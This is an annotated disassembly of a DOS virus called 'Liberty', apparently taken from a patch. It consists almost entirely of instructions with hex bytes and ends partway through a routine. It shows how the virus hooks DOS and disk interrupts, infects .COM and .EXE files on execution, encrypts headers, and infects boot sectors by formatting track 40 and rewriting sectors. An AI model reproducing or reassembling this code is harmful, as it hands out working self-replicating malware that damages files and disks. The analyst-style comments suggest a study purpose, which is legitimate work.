+CS:01A7 E8D700 CALL 0281 ; Get vector 21h
+CS:01AA 07 POP ES
+CS:01AB 06 PUSH ES
+CS:01AC 8CC0 MOV AX,ES
+CS:01AE 48 DEC AX
+CS:01AF 8ED8 MOV DS,AX
+CS:01B1 E8DC00 CALL 0290 ; Adjust MCB
+CS:01B4 8EC0 MOV ES,AX
+CS:01B6 0E PUSH CS
+CS:01B7 1F POP DS
+CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory
+CS:01BB E8F400 CALL 02B2 ; Set vector 21h
+CS:01BE E80101 CALL 02C2 ; Set installation flag
+CS:01C1 2E CS:
+CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
+CS:01C7 7417 JZ 01E0
+CS:01C9 07 POP ES
+CS:01CA 0E PUSH CS
+CS:01CB 1F POP DS
+CS:01CC E80901 CALL 02D8 ; Decrypt header
+CS:01CF E81901 CALL 02EB ; Restore header
+CS:01D2 07 POP ES
+CS:01D3 1F POP DS
+CS:01D4 5A POP DX
+CS:01D5 59 POP CX
+CS:01D6 5B POP BX
+CS:01D7 58 POP AX
+CS:01D8 1E PUSH DS
+CS:01D9 BF0001 MOV DI,0100
+CS:01DC 57 PUSH DI
+CS:01DD 33FF XOR DI,DI
+CS:01DF CB RETF ; Start file
+CS:01E0 FA CLI
+CS:01E1 5E POP SI
+CS:01E2 07 POP ES
+CS:01E3 1F POP DS
+CS:01E4 5A POP DX
+CS:01E5 59 POP CX
+CS:01E6 5B POP BX
+CS:01E7 58 POP AX
+CS:01E8 2E CS:
+CS:01E9 8B3E2C06 MOV DI,[062C]
+CS:01ED 03FE ADD DI,SI
+CS:01EF 8ED7 MOV SS,DI
+CS:01F1 2E CS:
+CS:01F2 8B3E2E06 MOV DI,[062E]
+CS:01F6 8BE7 MOV SP,DI ; Restore stack
+CS:01F8 2E CS:
+CS:01F9 8B3E2806 MOV DI,[0628]
+CS:01FD 03FE ADD DI,SI
+CS:01FF 57 PUSH DI
+CS:0200 2E CS:
+CS:0201 FF362A06 PUSH [062A]
+CS:0205 33F6 XOR SI,SI
+CS:0207 EBD4 JMP 01DD ; Start file
+;
+; The encrypted Liberty header for .COM files
+;
+DS:0200 1D 69 D9 00 01 01
+DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02
+DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92
+DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81
+DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A
+DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6
+DS:0260 46 E5 20 02
+;
+; Various subroutines used by the virus
+;
+CS:026F 2E CS:
+CS:0270 8A1E6A02 MOV BL,[026A]
+CS:0274 32FF XOR BH,BH
+CS:0276 33C0 XOR AX,AX
+CS:0278 8ED8 MOV DS,AX
+CS:027A D1E3 SHL BX,1
+CS:027C D1E3 SHL BX,1
+CS:027E 8B07 MOV AX,[BX]
+CS:0280 C3 RET
+CS:0281 A18400 MOV AX,[0084]
+CS:0284 2E CS:
+CS:0285 A38C03 MOV [038C],AX
+CS:0288 A18600 MOV AX,[0086]
+CS:028B 2E CS:
+CS:028C A38E03 MOV [038E],AX
+CS:028F C3 RET
+CS:0290 BB4221 MOV BX,2142
+CS:0293 B104 MOV CL,04
+CS:0295 D3EB SHR BX,CL
+CS:0297 291E0300 SUB [0003],BX
+CS:029B A10300 MOV AX,[0003]
+CS:029E 03060100 ADD AX,[0001]
+CS:02A2 A31200 MOV [0012],AX
+CS:02A5 40 INC AX
+CS:02A6 C3 RET
+CS:02A7 BF1001 MOV 
DI,0110
+CS:02AA 8BF7 MOV SI,DI
+CS:02AC B99A05 MOV CX,059A
+CS:02AF F3 REPZ
+CS:02B0 A5 MOVSW
+CS:02B1 C3 RET
+CS:02B2 33C0 XOR AX,AX
+CS:02B4 8ED8 MOV DS,AX
+CS:02B6 FA CLI
+CS:02B7 B86C03 MOV AX,036C
+CS:02BA A38400 MOV [0084],AX
+CS:02BD 8C068600 MOV [0086],ES
+CS:02C1 C3 RET
+CS:02C2 FA CLI
+CS:02C3 B8FFFF MOV AX,FFFF
+CS:02C6 2E CS:
+CS:02C7 8A1E6A02 MOV BL,[026A]
+CS:02CB 32FF XOR BH,BH
+CS:02CD D1E3 SHL BX,1
+CS:02CF D1E3 SHL BX,1
+CS:02D1 8907 MOV [BX],AX
+CS:02D3 40 INC AX
+CS:02D4 894702 MOV [BX+02],AX
+CS:02D7 C3 RET
+CS:02D8 B93C00 MOV CX,003C
+CS:02DB BE1301 MOV SI,0113
+CS:02DE 2E CS:
+CS:02DF 8B14 MOV DX,[SI]
+CS:02E1 D3CA ROR DX,CL
+CS:02E3 2E CS:
+CS:02E4 8914 MOV [SI],DX
+CS:02E6 46 INC SI
+CS:02E7 46 INC SI
+CS:02E8 E2F4 LOOP 02DE
+CS:02EA C3 RET
+CS:02EB BF0001 MOV DI,0100
+CS:02EE BE1301 MOV SI,0113
+CS:02F1 B93C00 MOV CX,003C
+CS:02F4 F3 REPZ
+CS:02F5 A5 MOVSW
+CS:02F6 C3 RET
+;
+; I am not sure what the next routine is supposed to be doing.
+;
+CS:02F7 9C PUSHF
+CS:02F8 2E CS:
+CS:02F9 803E100301 CMP BYTE PTR [0310],01
+CS:02FE 740A JZ 030A
+CS:0300 80FC03 CMP AH,03
+CS:0303 7505 JNZ 030A
+CS:0305 80FA80 CMP DL,80
+CS:0308 7207 JB 0311
+CS:030A 9D POPF
+CS:030B EA00000000 JMP 0000:0000
+CS:0311 06 PUSH ES
+CS:0312 0E PUSH CS
+CS:0313 07 POP ES
+CS:0314 B80902 MOV AX,0209
+CS:0317 BB420C MOV BX,0C42
+CS:031A B90100 MOV CX,0001
+CS:031D 9C PUSHF
+CS:031E 2E CS:
+CS:031F FF1E0C03 CALL FAR [030C]
+CS:0323 72E5 JB 030A
+CS:0325 B80905 MOV AX,0509
+CS:0328 BB4803 MOV BX,0348
+CS:032B B93100 MOV CX,0031
+CS:032E 9C PUSHF
+CS:032F 2E CS:
+CS:0330 FF1E0C03 CALL FAR [030C]
+CS:0334 72D4 JB 030A
+CS:0336 B80903 MOV AX,0309
+CS:0339 BB420C MOV BX,0C42
+CS:033C B93100 MOV CX,0031
+CS:033F 9C PUSHF
+CS:0340 2E CS:
+CS:0341 FF1E0C03 CALL FAR [030C]
+CS:0345 07 POP ES
+CS:0346 9D POPF
+CS:0347 CF IRET
+;
+; Another format table used by the virus
+;
+DS:0340 00 00 31 02 00 00 32 02
+DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02
+DS:0360 00 00 37 02 
00 00 38 02-00 00 39 02
+;
+; The virus infects files by monitoring function 4Bh of vector 21h
+;
+CS:036C 9C PUSHF
+CS:036D 3D004B CMP AX,4B00 ; Execute function ?
+CS:0370 741E JZ 0390
+CS:0372 EB16 JMP 038A
+CS:0374 90 NOP
+CS:0375 E8B901 CALL 0531 ; Close file
+CS:0378 E89A00 CALL 0415 ; Restore vectors
+CS:037B C6060C04FF MOV BYTE PTR [040C],FF
+CS:0380 90 NOP
+CS:0381 9D POPF
+CS:0382 07 POP ES
+CS:0383 1F POP DS
+CS:0384 5F POP DI
+CS:0385 5E POP SI
+CS:0386 5A POP DX
+CS:0387 59 POP CX
+CS:0388 5B POP BX
+CS:0389 58 POP AX
+CS:038A 9D POPF
+CS:038B EA77142C02 JMP 022C:1477 ; Continue
+CS:0390 50 PUSH AX
+CS:0391 53 PUSH BX
+CS:0392 51 PUSH CX
+CS:0393 52 PUSH DX
+CS:0394 56 PUSH SI
+CS:0395 57 PUSH DI
+CS:0396 1E PUSH DS
+CS:0397 06 PUSH ES
+CS:0398 9C PUSHF
+CS:0399 E8A600 CALL 0442 ; Set error vectors
+CS:039C E8E100 CALL 0480 ; Open file
+CS:039F 72D4 JB 0375
+CS:03A1 0E PUSH CS
+CS:03A2 1F POP DS
+CS:03A3 0E PUSH CS
+CS:03A4 07 POP ES
+CS:03A5 A30A04 MOV [040A],AX
+CS:03A8 93 XCHG BX,AX
+CS:03A9 C6060C0401 MOV BYTE PTR [040C],01
+CS:03AE 90 NOP
+CS:03AF E8D800 CALL 048A ; Read file header
+CS:03B2 72C1 JB 0375
+CS:03B4 BB1301 MOV BX,0113
+CS:03B7 2E CS:
+CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ?
+CS:03BC 7505 JNZ 03C3
+CS:03BE E8C001 CALL 0581 ; Adapt header
+CS:03C1 EBB2 JMP 0375
+CS:03C3 2E CS:
+CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch
+CS:03C9 E8CD00 CALL 0499 ; Check infection
+CS:03CC 74A7 JZ 0375
+CS:03CE E8DD00 CALL 04AE ; Encrypt header
+CS:03D1 E8EB00 CALL 04BF ; Move to EOF
+CS:03D4 729F JB 0375
+CS:03D6 83FA00 CMP DX,+00 ;
+CS:03D9 759A JNZ 0375 ;
+CS:03DB 3D0005 CMP AX,0500 ;
+CS:03DE 7295 JB 0375 ;
+CS:03E0 3DFFEF CMP AX,EFFF ;
+CS:03E3 7390 JNB 0375 ; Check file size
+CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph
+CS:03E8 728B JB 0375
+CS:03EA E80701 CALL 04F4 ; Write virus
+CS:03ED 7286 JB 0375
+CS:03EF 3BC1 CMP AX,CX
+CS:03F1 7C11 JL 0404
+CS:03F3 E81301 CALL 0509 ; Move to BOF
+CS:03F6 7209 JB 0401
+CS:03F8 E86201 CALL 055D ; Decrypt Libery header
+CS:03FB E81E01 CALL 051C ; Write Liberty header
+CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header
+CS:0401 E971FF JMP 0375
+CS:0404 E83801 CALL 053F ; Set & get vector 13h
+CS:0407 E96BFF JMP 0375
+;
+; Revectoring of error vectors. 
+;
+CS:0415 1E PUSH DS
+CS:0416 33DB XOR BX,BX
+CS:0418 8EDB MOV DS,BX
+CS:041A FA CLI
+CS:041B 2E CS:
+CS:041C 8B1E0D04 MOV BX,[040D]
+CS:0420 891E8C00 MOV [008C],BX
+CS:0424 2E CS:
+CS:0425 8B1E0F04 MOV BX,[040F]
+CS:0429 891E8E00 MOV [008E],BX
+CS:042D FA CLI
+CS:042E 2E CS:
+CS:042F 8B1E1104 MOV BX,[0411]
+CS:0433 891E9000 MOV [0090],BX
+CS:0437 2E CS:
+CS:0438 8B1E1304 MOV BX,[0413]
+CS:043C 891E8E00 MOV [008E],BX
+CS:0440 1F POP DS
+CS:0441 C3 RET
+CS:0442 1E PUSH DS
+CS:0443 33DB XOR BX,BX
+CS:0445 8EDB MOV DS,BX
+CS:0447 8B1E8C00 MOV BX,[008C]
+CS:044B 2E CS:
+CS:044C 891E0D04 MOV [040D],BX
+CS:0450 8B1E8E00 MOV BX,[008E]
+CS:0454 2E CS:
+CS:0455 891E0F04 MOV [040F],BX
+CS:0459 FA CLI
+CS:045A BB3106 MOV BX,0631
+CS:045D 891E8C00 MOV [008C],BX
+CS:0461 8C0E8E00 MOV [008E],CS
+CS:0465 8B1E9000 MOV BX,[0090]
+CS:0469 2E CS:
+CS:046A 891E1104 MOV [0411],BX
+CS:046E 8B1E9200 MOV BX,[0092]
+CS:0472 FA CLI
+CS:0473 BB3206 MOV BX,0632
+CS:0476 891E9000 MOV [0090],BX
+CS:047A 8C0E9200 MOV [0092],CS
+CS:047E 1F POP DS
+CS:047F C3 RET
+;
+; Various subroutines used by the virus
+;
+CS:0480 B8023D MOV AX,3D02
+CS:0483 9C PUSHF
+CS:0484 2E CS:
+CS:0485 FF1E8C03 CALL FAR [038C]
+CS:0489 C3 RET
+CS:048A B43F MOV AH,3F
+CS:048C B97800 MOV CX,0078
+CS:048F BA1301 MOV DX,0113
+CS:0492 9C PUSHF
+CS:0493 2E CS:
+CS:0494 FF1E8C03 CALL FAR [038C]
+CS:0498 C3 RET
+CS:0499 BF1301 MOV DI,0113
+CS:049C 81C76802 ADD DI,0268
+CS:04A0 81EF0A02 SUB DI,020A
+CS:04A4 BE6802 MOV SI,0268
+CS:04A7 FC CLD
+CS:04A8 B90700 MOV CX,0007
+CS:04AB F3 REPZ
+CS:04AC A6 CMPSB
+CS:04AD C3 RET
+CS:04AE B93C00 MOV CX,003C
+CS:04B1 BE1301 MOV SI,0113
+CS:04B4 8B14 MOV DX,[SI]
+CS:04B6 D3C2 ROL DX,CL
+CS:04B8 8914 MOV [SI],DX
+CS:04BA 46 INC SI
+CS:04BB 46 INC SI
+CS:04BC E2F6 LOOP 04B4
+CS:04BE C3 RET
+CS:04BF B80242 MOV AX,4202
+CS:04C2 2E CS:
+CS:04C3 8B1E0A04 MOV BX,[040A]
+CS:04C7 33C9 XOR CX,CX
+CS:04C9 33D2 XOR DX,DX
+CS:04CB 9C PUSHF
+CS:04CC 2E CS:
+CS:04CD FF1E8C03 CALL FAR [038C]
+CS:04D1 C3 
RET
+CS:04D2 B90400 MOV CX,0004
+CS:04D5 D3E8 SHR AX,CL
+CS:04D7 BB6602 MOV BX,0266
+CS:04DA 8907 MOV [BX],AX
+CS:04DC 40 INC AX
+CS:04DD B90400 MOV CX,0004
+CS:04E0 D3E0 SHL AX,CL
+CS:04E2 92 XCHG DX,AX
+CS:04E3 33C9 XOR CX,CX
+CS:04E5 B80042 MOV AX,4200
+CS:04E8 2E CS:
+CS:04E9 8B1E0A04 MOV BX,[040A]
+CS:04ED 9C PUSHF
+CS:04EE 2E CS:
+CS:04EF FF1E8C03 CALL FAR [038C]
+CS:04F3 C3 RET
+CS:04F4 B9330B MOV CX,0B33
+CS:04F7 B80040 MOV AX,4000
+CS:04FA BA1001 MOV DX,0110
+CS:04FD 2E CS:
+CS:04FE 8B1E0A04 MOV BX,[040A]
+CS:0502 9C PUSHF
+CS:0503 2E CS:
+CS:0504 FF1E8C03 CALL FAR [038C]
+CS:0508 C3 RET
+CS:0509 B80042 MOV AX,4200
+CS:050C 2E CS:
+CS:050D 8B1E0A04 MOV BX,[040A]
+CS:0511 33C9 XOR CX,CX
+CS:0513 33D2 XOR DX,DX
+CS:0515 9C PUSHF
+CS:0516 2E CS:
+CS:0517 FF1E8C03 CALL FAR [038C]
+CS:051B C3 RET
+CS:051C BA0A02 MOV DX,020A
+CS:051F B80040 MOV AX,4000
+CS:0522 2E CS:
+CS:0523 8B1E0A04 MOV BX,[040A]
+CS:0527 B97800 MOV CX,0078
+CS:052A 9C PUSHF
+CS:052B 2E CS:
+CS:052C FF1E8C03 CALL FAR [038C]
+CS:0530 C3 RET
+CS:0531 B43E MOV AH,3E
+CS:0533 2E CS:
+CS:0534 8B1E0A04 MOV BX,[040A]
+CS:0538 9C PUSHF
+CS:0539 2E CS:
+CS:053A FF1E8C03 CALL FAR [038C]
+CS:053E C3 RET
+CS:053F 33C0 XOR AX,AX
+CS:0541 8ED8 MOV DS,AX
+CS:0543 FA CLI
+CS:0544 A14C00 MOV AX,[004C]
+CS:0547 2E CS:
+CS:0548 A31407 MOV [0714],AX
+CS:054B A14E00 MOV AX,[004E]
+CS:054E 2E CS:
+CS:054F A31607 MOV [0716],AX
+CS:0552 B8F906 MOV AX,06F9
+CS:0555 A34C00 MOV [004C],AX
+CS:0558 8C0E4E00 MOV [004E],CS
+CS:055C C3 RET
+;
+; Header encrypting
+;
+CS:055D B92D00 MOV CX,002D
+CS:0560 BE0A02 MOV SI,020A
+CS:0563 2E CS:
+CS:0564 8B3C MOV DI,[SI]
+CS:0566 D3CF ROR DI,CL
+CS:0568 2E CS:
+CS:0569 893C MOV [SI],DI
+CS:056B 46 INC SI
+CS:056C 46 INC SI
+CS:056D E2F4 LOOP 0563
+CS:056F C3 RET
+CS:0570 BE0A02 MOV SI,020A
+CS:0573 B92D00 MOV CX,002D
+CS:0576 8B3C MOV DI,[SI]
+CS:0578 D3C7 ROL DI,CL
+CS:057A 893C MOV [SI],DI
+CS:057C 46 INC SI
+CS:057D 46 INC SI
+CS:057E E2F6 LOOP 0576
+CS:0580 C3 RET
+;
+; .EXE 
file handling
+;
+CS:0581 8B7F02 MOV DI,[BX+02]
+CS:0584 83FFFF CMP DI,-01 ; Check infection
+CS:0587 7439 JZ 05C2
+CS:0589 8B7F16 MOV DI,[BX+16]
+CS:058C 83C710 ADD DI,+10
+CS:058F 893E2806 MOV [0628],DI
+CS:0593 8B7F14 MOV DI,[BX+14]
+CS:0596 893E2A06 MOV [062A],DI
+CS:059A 8B7F0E MOV DI,[BX+0E]
+CS:059D 83C710 ADD DI,+10
+CS:05A0 893E2C06 MOV [062C],DI
+CS:05A4 8B7F10 MOV DI,[BX+10]
+CS:05A7 893E2E06 MOV [062E],DI
+CS:05AB BF1001 MOV DI,0110
+CS:05AE 897F14 MOV [BX+14],DI ; Set IP
+CS:05B1 BF420D MOV DI,0D42
+CS:05B4 897F10 MOV [BX+10],DI ; Set SP
+CS:05B7 2E CS:
+CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch
+CS:05BD E8FFFE CALL 04BF ; Move to EOF
+CS:05C0 7301 JNB 05C3
+CS:05C2 C3 RET
+CS:05C3 83FA0A CMP DX,+0A ;
+CS:05C6 77FA JA 05C2 ; Check file size
+CS:05C8 B104 MOV CL,04
+CS:05CA D3E8 SHR AX,CL
+CS:05CC 40 INC AX
+CS:05CD 3D0010 CMP AX,1000
+CS:05D0 7501 JNZ 05D3
+CS:05D2 42 INC DX
+CS:05D3 D3E0 SHL AX,CL
+CS:05D5 50 PUSH AX
+CS:05D6 52 PUSH DX
+CS:05D7 B91000 MOV CX,0010
+CS:05DA F7F1 DIV CX
+CS:05DC BB1301 MOV BX,0113
+CS:05DF 2D1100 SUB AX,0011
+CS:05E2 8B7F08 MOV DI,[BX+08]
+CS:05E5 2BC7 SUB AX,DI
+CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment
+CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment
+CS:05ED 59 POP CX
+CS:05EE 5A POP DX
+CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph
+CS:05F2 722F JB 0623
+CS:05F4 E8FDFE CALL 04F4 ; Write virus
+CS:05F7 722A JB 0623
+CS:05F9 3BC1 CMP AX,CX
+CS:05FB 7C27 JL 0624
+CS:05FD E8BFFE CALL 04BF ; Move to BOF
+CS:0600 7221 JB 0623
+CS:0602 B90002 MOV CX,0200
+CS:0605 F7F1 DIV CX
+CS:0607 83FA00 CMP DX,+00
+CS:060A 7401 JZ 060D
+CS:060C 40 INC AX
+CS:060D BB1301 MOV BX,0113
+CS:0610 894704 MOV [BX+04],AX ; Set blocks
+CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark
+CS:0618 E8EEFE CALL 0509 ; Move to BOF
+CS:061B 7206 JB 0623
+CS:061D BA1301 MOV DX,0113
+CS:0620 E8FCFE CALL 051F ; Write header
+CS:0623 C3 RET
+CS:0624 E818FF CALL 053F ; Set & get vector 13h
+CS:0627 C3 RET
+;
+; Error 
vectors
+;
+CS:0631 CF IRET ; Error vector 23h
+CS:0632 32C0 XOR AL,AL ;
+CS:0634 CF IRET ; Error vector 24h
+;
+; The next part is the virus's bootsector
+;
+CS:0635 EB01 JMP 0638
+CS:0637 90 NOP
+CS:0638 33C0 XOR AX,AX
+CS:063A 8ED0 MOV SS,AX
+CS:063C BC007C MOV SP,7C00
+CS:063F 33C0 XOR AX,AX
+CS:0641 8EC0 MOV ES,AX
+CS:0643 BB1304 MOV BX,0413 ;
+CS:0646 26 ES: ;
+CS:0647 8B07 MOV AX,[BX] ;
+CS:0649 2D0A00 SUB AX,000A ;
+CS:064C B106 MOV CL,06 ;
+CS:064E 26 ES: ;
+CS:064F 8907 MOV [BX],AX ; Decrease memory
+CS:0651 D3E0 SHL AX,CL
+CS:0653 8EC0 MOV ES,AX
+CS:0655 B80802 MOV AX,0208 ;
+CS:0658 BB1001 MOV BX,0110 ;
+CS:065B B93128 MOV CX,2831 ;
+CS:065E 33D2 XOR DX,DX ;
+CS:0660 CD13 INT 13 ; Read virus
+CS:0662 06 PUSH ES
+CS:0663 BB6806 MOV BX,0668
+CS:0666 53 PUSH BX
+CS:0667 CB RETF
+CS:0668 2E CS:
+CS:0669 803EC8060A CMP BYTE PTR [06C8],0A
+CS:066E 7446 JZ 06B6
+CS:0670 33C0 XOR AX,AX
+CS:0672 8ED8 MOV DS,AX
+CS:0674 2E CS:
+CS:0675 FE06C806 INC BYTE PTR [06C8]
+CS:0679 B80803 MOV AX,0308
+CS:067C BB1001 MOV BX,0110
+CS:067F B93128 MOV CX,2831
+CS:0682 33D2 XOR DX,DX
+CS:0684 CD13 INT 13
+CS:0686 E85200 CALL 06DB ; Set & get vector 13h
+CS:0689 2E CS: ;
+CS:068A C606470BFF MOV BYTE PTR [0B47],FF ;
+CS:068F 90 NOP ;
+CS:0690 2E CS: ;
+CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ;
+CS:0696 90 NOP ;
+CS:0697 2E CS: ;
+CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off
+CS:069D 90 NOP
+CS:069E E82902 CALL 08CA ; Set & get vector 8h
+CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch
+CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h
+CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h
+CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h
+CS:06AD E81900 CALL 06C9 ; Read original bootsector
+CS:06B0 BB007C MOV BX,7C00 ;
+CS:06B3 1E PUSH DS ;
+CS:06B4 53 PUSH BX ;
+CS:06B5 CB RETF ; Start
+CS:06B6 E81000 CALL 06C9 ; Read bootsector
+CS:06B9 B80103 MOV AX,0301
+CS:06BC BB007C MOV BX,7C00
+CS:06BF B90100 MOV CX,0001
+CS:06C2 33D2 XOR DX,DX
+CS:06C4 CD13 INT 13
+CS:06C6 EBE5 JMP 
06AD
+CS:06C9 33C0 XOR AX,AX
+CS:06CB 8EC0 MOV ES,AX
+CS:06CD B80102 MOV AX,0201
+CS:06D0 BB007C MOV BX,7C00
+CS:06D3 B93F28 MOV CX,283F
+CS:06D6 33D2 XOR DX,DX
+CS:06D8 CD13 INT 13
+CS:06DA C3 RET
+CS:06DB 33C0 XOR AX,AX
+CS:06DD 8ED8 MOV DS,AX
+CS:06DF A14C00 MOV AX,[004C]
+CS:06E2 2E CS:
+CS:06E3 A31608 MOV [0816],AX
+CS:06E6 A14E00 MOV AX,[004E]
+CS:06E9 2E CS:
+CS:06EA A31808 MOV [0818],AX
+CS:06ED FA CLI
+CS:06EE B8FB07 MOV AX,07FB
+CS:06F1 A34C00 MOV [004C],AX
+CS:06F4 8C0E4E00 MOV [004E],CS
+CS:06F8 C3 RET
+;
+; Boot sectors are infected via vector 13h
+;
+CS:06F9 9C PUSHF
+CS:06FA 80FC01 CMP AH,01
+CS:06FD 7E13 JLE 0712
+CS:06FF 80FC04 CMP AH,04
+CS:0702 7D0E JGE 0712
+CS:0704 80FA80 CMP DL,80
+CS:0707 720F JB 0718
+CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h
+CS:070C 07 POP ES
+CS:070D 1F POP DS
+CS:070E 5A POP DX
+CS:070F 59 POP CX
+CS:0710 5B POP BX
+CS:0711 58 POP AX
+CS:0712 9D POPF
+CS:0713 EA00000000 JMP 0000:0000
+CS:0718 50 PUSH AX
+CS:0719 53 PUSH BX
+CS:071A 51 PUSH CX
+CS:071B 52 PUSH DX
+CS:071C 1E PUSH DS
+CS:071D 06 PUSH ES
+CS:071E B80102 MOV AX,0201 ;
+CS:0721 0E PUSH CS ;
+CS:0722 07 POP ES ;
+CS:0723 0E PUSH CS ;
+CS:0724 1F POP DS ;
+CS:0725 BB420C MOV BX,0C42 ;
+CS:0728 B90100 MOV CX,0001 ;
+CS:072B 32F6 XOR DH,DH ;
+CS:072D 9C PUSHF ;
+CS:072E 2E CS: ;
+CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector
+CS:0733 72D4 JB 0709
+CS:0735 0E PUSH CS
+CS:0736 1F POP DS
+CS:0737 0E PUSH CS
+CS:0738 07 POP ES
+CS:0739 BE420C MOV SI,0C42 ;
+CS:073C BF3506 MOV DI,0635 ;
+CS:073F B90A00 MOV CX,000A ;
+CS:0742 FC CLD ;
+CS:0743 F3 REPZ ;
+CS:0744 A7 CMPSW ; Check infection
+CS:0745 74C2 JZ 0709
+CS:0747 BE420C MOV SI,0C42
+CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ?
+CS:074E 744A JZ 079A +CS:0750 B0FF MOV AL,FF +CS:0752 884402 MOV [SI+02],AL +CS:0755 B80905 MOV AX,0509 ; +CS:0758 BBA607 MOV BX,07A6 ; +CS:075B B93128 MOV CX,2831 ; +CS:075E 9C PUSHF ; +CS:075F 2E CS: ; +CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40 +CS:0764 72A3 JB 0709 +CS:0766 B80103 MOV AX,0301 ; +CS:0769 BB420C MOV BX,0C42 ; +CS:076C B93F28 MOV CX,283F ; +CS:076F 9C PUSHF ; +CS:0770 2E CS: ; +CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector +CS:0775 7292 JB 0709 +CS:0777 B80103 MOV AX,0301 ; +CS:077A BB3506 MOV BX,0635 ; +CS:077D B90100 MOV CX,0001 ; +CS:0780 9C PUSHF ; +CS:0781 2E CS: ; +CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector +CS:0786 7281 JB 0709 +CS:0788 B80803 MOV AX,0308 ; +CS:078B BB1001 MOV BX,0110 ; +CS:078E B93128 MOV CX,2831 ; +CS:0791 9C PUSHF ; +CS:0792 2E CS: ; +CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus +CS:0797 E96FFF JMP 0709 +CS:079A 2E CS: ; +CS:079B C606100300 MOV BYTE PTR [0310],00 ; +CS:07A0 E83B00 CALL 07DE ; Attach ??? 
+CS:07A3 E963FF JMP 0709 +; +; The format table is next +; +DS:07A0 28 00-31 02 28 00 32 02 28 00 +DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00 +DS:07C0 37 02 28 00 38 02 28 00-3F 02 +; +; Revectoring +; +CS:07CA 33C0 XOR AX,AX +CS:07CC 8ED8 MOV DS,AX +CS:07CE FA CLI +CS:07CF 2E CS: +CS:07D0 A11407 MOV AX,[0714] +CS:07D3 A34C00 MOV [004C],AX +CS:07D6 2E CS: +CS:07D7 A11607 MOV AX,[0716] +CS:07DA A34E00 MOV [004E],AX +CS:07DD C3 RET +CS:07DE 2E CS: +CS:07DF A11407 MOV AX,[0714] +CS:07E2 2E CS: +CS:07E3 A30C03 MOV [030C],AX +CS:07E6 2E CS: +CS:07E7 A11607 MOV AX,[0716] +CS:07EA 2E CS: +CS:07EB A30E03 MOV [030E],AX +CS:07EE B8F702 MOV AX,02F7 +CS:07F1 2E CS: +CS:07F2 A31407 MOV [0714],AX +CS:07F5 2E CS: +CS:07F6 8C0E1607 MOV [0716],CS +CS:07FA C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:07FB 9C PUSHF +CS:07FC 80FC03 CMP AH,03 +CS:07FF 7213 JB 0814 +CS:0801 80FC05 CMP AH,05 +CS:0804 730E JNB 0814 +CS:0806 80FA80 CMP DL,80 +CS:0809 720F JB 081A +CS:080B EB07 JMP 0814 +CS:080D 90 NOP +CS:080E 07 POP ES +CS:080F 1F POP DS +CS:0810 5A POP DX +CS:0811 59 POP CX +CS:0812 5B POP BX +CS:0813 58 POP AX +CS:0814 9D POPF +CS:0815 EA00000000 JMP 0000:0000 +CS:081A 50 PUSH AX +CS:081B 53 PUSH BX +CS:081C 51 PUSH CX +CS:081D 52 PUSH DX +CS:081E 1E PUSH DS +CS:081F 06 PUSH ES +CS:0820 2E CS: +CS:0821 803E0C0401 CMP BYTE PTR [040C],01 +CS:0826 74E6 JZ 080E +CS:0828 B80102 MOV AX,0201 ; +CS:082B 0E PUSH CS ; +CS:082C 07 POP ES ; +CS:082D 0E PUSH CS ; +CS:082E 1F POP DS ; +CS:082F BB420C MOV BX,0C42 ; +CS:0832 B90100 MOV CX,0001 ; +CS:0835 32F6 XOR DH,DH ; +CS:0837 9C PUSHF ; +CS:0838 2E CS: ; +CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector +CS:083D 72CF JB 080E +CS:083F 0E PUSH CS +CS:0840 1F POP DS +CS:0841 0E PUSH CS +CS:0842 07 POP ES +CS:0843 BE420C MOV SI,0C42 ; +CS:0846 BF3506 MOV DI,0635 ; +CS:0849 B90A00 MOV CX,000A ; +CS:084C FC CLD ; +CS:084D F3 REPZ ; +CS:084E A7 CMPSW ; Check infection +CS:084F 74BD JZ 080E +CS:0851 B0FF MOV AL,FF +CS:0853 
